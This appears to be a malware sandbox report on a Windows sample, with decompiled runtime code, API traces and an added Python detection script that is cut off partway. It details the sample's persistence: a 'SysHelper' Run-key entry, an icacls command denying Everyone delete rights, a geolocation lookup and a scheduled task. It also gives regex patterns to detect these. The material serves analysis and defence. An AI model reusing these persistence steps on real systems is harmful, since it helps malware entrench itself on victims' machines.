                                                                                      • __getptd.LIBCMT ref: 00405616
                                                                                      • __amsg_exit.LIBCMT ref: 00405624
                                                                                      • __lock.LIBCMT ref: 00405634
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                      • String ID:
                                                                                      • API String ID: 3521780317-0
                                                                                      • Opcode ID: ebf836fdf6256b87ecdebd66eb5e83269563747bb106a499378bba13cdba9c3b
                                                                                      • Instruction ID: b3972ed9e45a2de8ebcbf974438e3a8231b760fa2e1e5ff5c63e9030658df030
                                                                                      • Opcode Fuzzy Hash: ebf836fdf6256b87ecdebd66eb5e83269563747bb106a499378bba13cdba9c3b
                                                                                      • Instruction Fuzzy Hash: F7F06D31941A10DBD720BB65880675A73A0EB00729F58853FE885B76C2DF7C99019F5E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E0040BD3F(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
	intOrPtr _t17;
	void* _t19;
	void* _t26;
	void* _t27;
	intOrPtr* _t28;
	void* _t29; /* frame pointer of the enclosing frame; the decompiler reads locals through it but never assigns it */
	void* _t30;
	intOrPtr _t37;
	intOrPtr _t38;

	_t30 = __eflags;
	_t28 = __esi;
	_t27 = __edi;
	_t26 = __edx;
	_t19 = __ebx;
	 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
	E00405194(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
	/* E00408C61 is __getptd (see APIs below): the two stores restore fields at +0x88 and +0x8c
	   of the per-thread CRT data (_tiddata) from saved stack slots. */
	 *((intOrPtr*)(E00408C61(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
	_t17 = E00408C61(_t19, _t26, _t27, _t30);
	 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
	/* __esi points at an EXCEPTION_RECORD: 0xe06d7363 is the MSVC C++ exception code ('msc' | 0xE0000000),
	   +0x10 is NumberParameters (3 for a C++ throw) and +0x14 is ExceptionInformation[0], the EH magic
	   number (0x19930520..0x19930522). This is CRT C++ exception-dispatch code, not sample-specific logic. */
	if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
		_t17 =  *((intOrPtr*)(__esi + 0x14));
		if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
			if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
				_t37 =  *((intOrPtr*)(_t29 - 0x1c));
				if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
					_t17 = E0040516D(_t37,  *((intOrPtr*)(_t28 + 0x18)));
					_t38 = _t17;
					if(_t17 != 0) {
						_push( *((intOrPtr*)(_t29 + 0x10)));
						_push(_t28);
						return E0040BAD7(_t38);
					}
				}
			}
		}
	}
	return _t17;
}


APIs
  • Part of subcall function 00405194: __getptd.LIBCMT ref: 0040519A
  • Part of subcall function 00405194: __getptd.LIBCMT ref: 004051AA
• __getptd.LIBCMT ref: 0040BD4E
  • Part of subcall function 00408C61: __getptd_noexit.LIBCMT ref: 00408C64
  • Part of subcall function 00408C61: __amsg_exit.LIBCMT ref: 00408C71
• __getptd.LIBCMT ref: 0040BD5C
Strings
Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• API String ID: 803148776-1018135373
• Opcode ID: 9a2ddc81ac4e063272d1699841b814f5de1f68bb8839ed38d5eec017d608f2da
• Instruction ID: 4cf3631a83ca47e317304b360ca9ca5d8c37365c55d1a14800d683c47fa9ba4b
• Opcode Fuzzy Hash: 9a2ddc81ac4e063272d1699841b814f5de1f68bb8839ed38d5eec017d608f2da
• Instruction Fuzzy Hash: D6011234801204CACF28DE25D444AAEB3B5EF10315F28443FE481AA7D2CB388990DF9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E00402B71(void* __ebx, void* __edi, signed int _a4) {
	signed int _v8;
	char _v16;
	signed int _v20;
	char _v24;
	char _v28;
	char _v40;
	void* __ebp;
	signed int* _t31;
	signed int _t35; /* deliberately uninitialised: the instruction is "or eax, -1", so the prior value is irrelevant */
	signed int _t36;
	intOrPtr _t47;
	void* _t50;
	void* _t56;
	signed int _t60;
	void* _t61;
	signed int _t64;
	intOrPtr* _t66;
	signed int _t68;
	signed int _t78;
	void* _t80;
	intOrPtr* _t81;
	signed int _t85;
	signed int _t86;
	void* _t88;

	_t80 = __edi;
	_t61 = __ebx;
	_t64 = _a4;
	/* Allocation-size check of the std::allocator::allocate() shape: with _t36 == 0xffffffff this tests
	   whether 0xffffffff / n < 1 (element size 1); if so a std::bad_alloc-style exception is thrown
	   (std::exception::exception at 00402BA2, __CxxThrowException@8 at 00402BB7, see APIs below). */
	if(_t64 > 0) {
		_t36 = _t35 | 0xffffffff;
		_t78 = _t36 % _t64;
		__eflags = _t36 / _t64 - 1;
		if(__eflags >= 0) {
			goto L2;
		} else {
			_a4 = _a4 & 0x00000000;
			_t66 =  &_v16;
			E004039A8(_t66, _t78,  &_a4);
			_v16 = 0x4a7244; /* vtable pointer of the thrown exception object */
			E004052D2( &_v16, 0x4abc00);
			/* The throw above does not return; the int3 is compiler padding. The decompiler ran on into the
			   next function, whose SEH prologue (E004A6CC8) follows. That function has the shape of
			   std::use_facet<F>(const std::locale&): _t81 is the locale, *0x4af658 the facet's locale::id
			   (lazily numbered from the global counter *0x4af64c), *0x4b838c the cached facet pointer. */
			asm("int3");
			E004A6CC8(E004A6EFE, _t88);
			_push(__ebx);
			_push(__edi);
			_t81 = _t66;
			E00403200( &_v28, 0);
			_v8 = 0;
			_v20 =  *0x4b838c;
			__eflags =  *0x4af658; // 0x0
			if(__eflags == 0) {
				E00403200( &_v24, 0);
				__eflags =  *0x4af658; // 0x0
				if(__eflags == 0) {
					 *0x4af64c =  *0x4af64c + 1;
					__eflags =  *0x4af64c;
					_t60 =  *0x4af64c; // 0x0
					 *0x4af658 = _t60;
				}
				E00403228( &_v24);
			}
			/* locale::_Getfacet: index the facet vector (+8) if the id is below the facet count (+0xc) */
			_t85 =  *0x4af658; // 0x0
			_t47 =  *_t81;
			__eflags = _t85 -  *((intOrPtr*)(_t47 + 0xc));
			if(_t85 >=  *((intOrPtr*)(_t47 + 0xc))) {
				_t68 = 0;
				__eflags = 0;
			} else {
				_t68 =  *( *((intOrPtr*)(_t47 + 8)) + _t85 * 4);
			}
			__eflags = _t68;
			if(_t68 != 0) {
				L17:
				_t86 = _t68;
			} else {
				/* not found locally: if the locale has a parent (+0x14), retry in the global locale (E00402EDE) */
				__eflags =  *(_t47 + 0x14);
				if( *(_t47 + 0x14) == 0) {
					goto L17;
				} else {
					_t56 = E00402EDE();
					__eflags = _t85 -  *((intOrPtr*)(_t56 + 0xc));
					if(_t85 >=  *((intOrPtr*)(_t56 + 0xc))) {
						_t86 = 0;
					} else {
						_t86 =  *( *((intOrPtr*)(_t56 + 8)) + _t85 * 4);
					}
				}
			}
			__eflags = _t86;
			if(_t86 == 0) {
				_t86 = _v20;
				__eflags = _t86;
				if(_t86 == 0) {
					/* no cached facet either: construct it (E004012EB); -1 means failure and std::bad_cast is thrown */
					_push(_t81);
					_t50 = E004012EB(0, _t78,  &_v20);
					__eflags = _t50 - 0xffffffff;
					if(_t50 == 0xffffffff) {
						E00403A98( &_v40, "bad cast");
						E004052D2( &_v40, 0x4abbc8);
					}
					_t86 = _v20;
					 *0x4b838c = _t86;
					E004011D6(_t86);
					E00402FA3(_t78, _t86);
				}
			}
			_t31 =  &_v8;
			 *_t31 = _v8 | 0xffffffff;
			__eflags =  *_t31;
			E00403228( &_v28);
			 *[fs:0x0] = _v16; /* SEH epilogue: unlink this frame from the handler chain */
			return _t86;
		}
	} else {
		_t64 = 0;
		L2:
		_push(_t64);
		return E004044A8(_t61, _t78, _t80, 0); /* E004044A8 wraps _malloc (see APIs below) */
	}
}


                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 00402BA2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402BB7
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: DrJ
                                                                                      • API String ID: 4063778783-64114676
                                                                                      • Opcode ID: 0474d3def17b3794ca22744718f68299944a1628c5d6be4130e4e3e0dc958057
                                                                                      • Instruction ID: c626501efe9eec911c111672c842ea421abfa753cf83b5d7ce926d37bdd0efde
                                                                                      • Opcode Fuzzy Hash: 0474d3def17b3794ca22744718f68299944a1628c5d6be4130e4e3e0dc958057
                                                                                      • Instruction Fuzzy Hash: BCE0E5B191010C6AC708EE65C546ADE376C9B61325F10863FA816E10C1DFB8E608CAAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E00402735(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				intOrPtr _v16;
                                                                                      				char _v20;
                                                                                      				void* __ebp;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				void* _t32;
                                                                                      				void* _t33;
                                                                                      				char* _t34;
                                                                                      				intOrPtr _t35;
                                                                                      				intOrPtr _t38;
                                                                                      				signed int _t40;
                                                                                      				char* _t42;
                                                                                      				intOrPtr _t44;
                                                                                      				signed int _t47;
                                                                                      				char* _t54;
                                                                                      				void* _t57;
                                                                                      				void* _t58;
                                                                                      
                                                                                      				_t49 = __edi;
                                                                                      				_t40 = __ecx;
                                                                                      				_t39 = __ebx;
                                                                                      				if(__ecx > 0) {
                                                                                      					_t24 = _t23 | 0xffffffff;
                                                                                      					_t47 = _t24 % __ecx;
                                                                                      					__eflags = _t24 / __ecx - 2;
                                                                                      					if(__eflags >= 0) {
                                                                                      						goto L2;
                                                                                      					} else {
                                                                                      						_v8 = _v8 & 0x00000000;
                                                                                      						_t42 =  &_v20;
                                                                                      						E004039A8(_t42, _t47,  &_v8);
                                                                                      						_v20 = 0x4a7244;
                                                                                      						E004052D2( &_v20, 0x4abc00);
                                                                                      						asm("int3");
                                                                                      						_t57 = _t58;
                                                                                      						_push(__edi);
                                                                                      						_t50 = _v16;
                                                                                      						_t54 = _t42;
                                                                                      						_t32 = E00402A73(_t42, _v16);
                                                                                      						__eflags = _t32;
                                                                                      						if(_t32 == 0) {
                                                                                      							_t33 = E0040287C(__ebx, _t54, _t57, _a4, 0);
                                                                                      							__eflags = _t33;
                                                                                      							if(_t33 != 0) {
                                                                                      								_t44 =  *((intOrPtr*)(_t54 + 0x18));
                                                                                      								__eflags = _t44 - 0x10;
                                                                                      								if(_t44 < 0x10) {
                                                                                      									_t35 = _t54 + 4;
                                                                                      								} else {
                                                                                      									_t35 =  *((intOrPtr*)(_t54 + 4));
                                                                                      								}
                                                                                      								E0040102D(_t35, _t44, _t50, _a4);
                                                                                      								E00402860(_t54, _a4);
                                                                                      							}
                                                                                      							_t34 = _t54;
                                                                                      						} else {
                                                                                      							__eflags =  *((intOrPtr*)(_t54 + 0x18)) - 0x10;
                                                                                      							if( *((intOrPtr*)(_t54 + 0x18)) < 0x10) {
                                                                                      								_t38 = _t54 + 4;
                                                                                      							} else {
                                                                                      								_t38 =  *((intOrPtr*)(_t54 + 4));
                                                                                      							}
                                                                                      							_t34 = E00402635(_t54, _t54, _t50 - _t38, _a4);
                                                                                      						}
                                                                                      						return _t34;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t40 = 0;
                                                                                      					L2:
                                                                                      					_push(_t40 + _t40);
                                                                                      					return E004044A8(_t39, _t47, _t49, 0);
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 00402764
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00402779
                                                                                        • Part of subcall function 004044A8: _malloc.LIBCMT ref: 004044C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                      • String ID: DrJ
                                                                                      • API String ID: 4063778783-64114676
                                                                                      • Opcode ID: 9b220adb6656214d1221c7abb41ce7e52fa530132925c7769b607adfe025d8ac
                                                                                      • Instruction ID: 9475e751551338985df67bcd7dff80b697199ef852ffb477803c007f7dfa69e0
                                                                                      • Opcode Fuzzy Hash: 9b220adb6656214d1221c7abb41ce7e52fa530132925c7769b607adfe025d8ac
                                                                                      • Instruction Fuzzy Hash: CFE02B7141050CAACB08F6A0C906AEF726CEF11315F60067F9032E20C1DBF88608866C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      APIs
                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,005ED868,?), ref: 0041A0BB
                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                      • API String ID: 2957410896-3144399390
                                                                                      • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                      • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                      • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                      • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                      • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                      • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                      • API String ID: 2496729271-1738591096
                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                      Strings
                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                      • API String ID: 1485416377-2962370585
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                      • _memset.LIBCMT ref: 00411D3B
                                                                                      • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                      • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                      • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                                                                      • GetCommandLineW.KERNEL32 ref: 00411EB4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                                                                      • lstrcpyW.KERNEL32 ref: 00411ECE
                                                                                      • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                                                                      • UuidCreate.RPCRT4(?), ref: 00411EFC
                                                                                      • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                                                                      • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                                                                      • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                                                                      • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00412036
                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                                                                      • _memset.LIBCMT ref: 00412090
                                                                                      • lstrcpyW.KERNEL32 ref: 004120AA
                                                                                      • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                                                                      • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                                                                      • lstrlenW.KERNEL32(?), ref: 004120D7
                                                                                      • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                                                                      • _memset.LIBCMT ref: 00412120
                                                                                      • SetLastError.KERNEL32(00000000), ref: 00412146
                                                                                      • lstrcpyW.KERNEL32 ref: 00412158
                                                                                      • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                      • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                      • API String ID: 2589766509-1182136429
                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%
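The function above is the persistence routine: it reads and then writes the `SysHelper` value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (RegSetValueExW type `00000002` is REG_EXPAND_SZ), copies the binary into a freshly created directory named with a UuidCreate/UuidToStringW string, appends `" --AutoStart"` to the quoted path, and, per the String ID list, runs `icacls "<dir>" /deny *S-1-1-0:(OI)(CI)(DE,DC)` so that Everyone (S-1-1-0) is denied delete and delete-child on the directory. An earlier function in the same dump fetches `https://api.2ip.ua/geo.json` and reads `"country_code"`. The following is an added triage script, not part of the sandbox report or the sample: it applies those three indicators to constructed host records. The `AppData\Local` parent folder, the user name and the UUID are assumptions (the trace only shows `SHGetFolderPathW` being resolved, not which folder), and the `Microsoft Internet Explorer` string is treated as the probable User-Agent because it appears in the same function as the URL.

```python
r"""Added example (not the sandbox's code): flag the persistence and geo-check
indicators shown in the API trace on constructed host records.

Indicators taken from the report:
  1. HKCU\Software\Microsoft\Windows\CurrentVersion\Run value "SysHelper",
     data '"<uuid-dir>\<exe>" --AutoStart', written as REG_EXPAND_SZ (type 2).
  2. icacls "<uuid-dir>" /deny *S-1-1-0:(OI)(CI)(DE,DC)  (Everyone denied
     delete/delete-child, inherited by the copied binary).
  3. GET https://api.2ip.ua/geo.json whose JSON "country_code" is read.
The AppData\Local parent, user name and UUID below are assumptions.
"""
import re

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
GEO_HOST = "api.2ip.ua"

# Textual UUID as produced by UuidToStringW (hex groups 8-4-4-4-12).
UUID_RE = re.compile(r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)
# '"<path>" --AutoStart' exactly as the trace builds it with lstrcpyW/lstrcatW.
RUN_DATA_RE = re.compile(r'^"(?P<exe>[^"]+)" --AutoStart$')
# The icacls command assembled from the 'icacls "' and '" /deny ...' string IDs.
ICACLS_RE = re.compile(r'^icacls "(?P<dir>[^"]+)" /deny \*S-1-1-0:\(OI\)\(CI\)\(DE,DC\)$', re.I)


def check_run_values(run_values):
    """run_values: {value_name: (reg_type, data)} read from the HKCU Run key."""
    hits = []
    for name, (reg_type, data) in run_values.items():
        m = RUN_DATA_RE.match(data)
        if name.lower() == "syshelper" and m and UUID_RE.search(m.group("exe")):
            hits.append(("run_key", name, m.group("exe"), reg_type))
    return hits


def check_command_lines(cmdlines):
    """cmdlines: process command lines, e.g. from Sysmon event ID 1."""
    hits = []
    for line in cmdlines:
        m = ICACLS_RE.match(line.strip())
        if m and UUID_RE.search(m.group("dir")):
            hits.append(("icacls_deny_everyone", m.group("dir")))
    return hits


def check_http(requests):
    """requests: (host, path, user_agent) tuples from a proxy or EDR log."""
    hits = []
    for host, path, ua in requests:
        if host.lower() == GEO_HOST and path.startswith("/geo.json"):
            hits.append(("geo_lookup", host + path, ua))
    return hits


def triage(run_values, cmdlines, requests):
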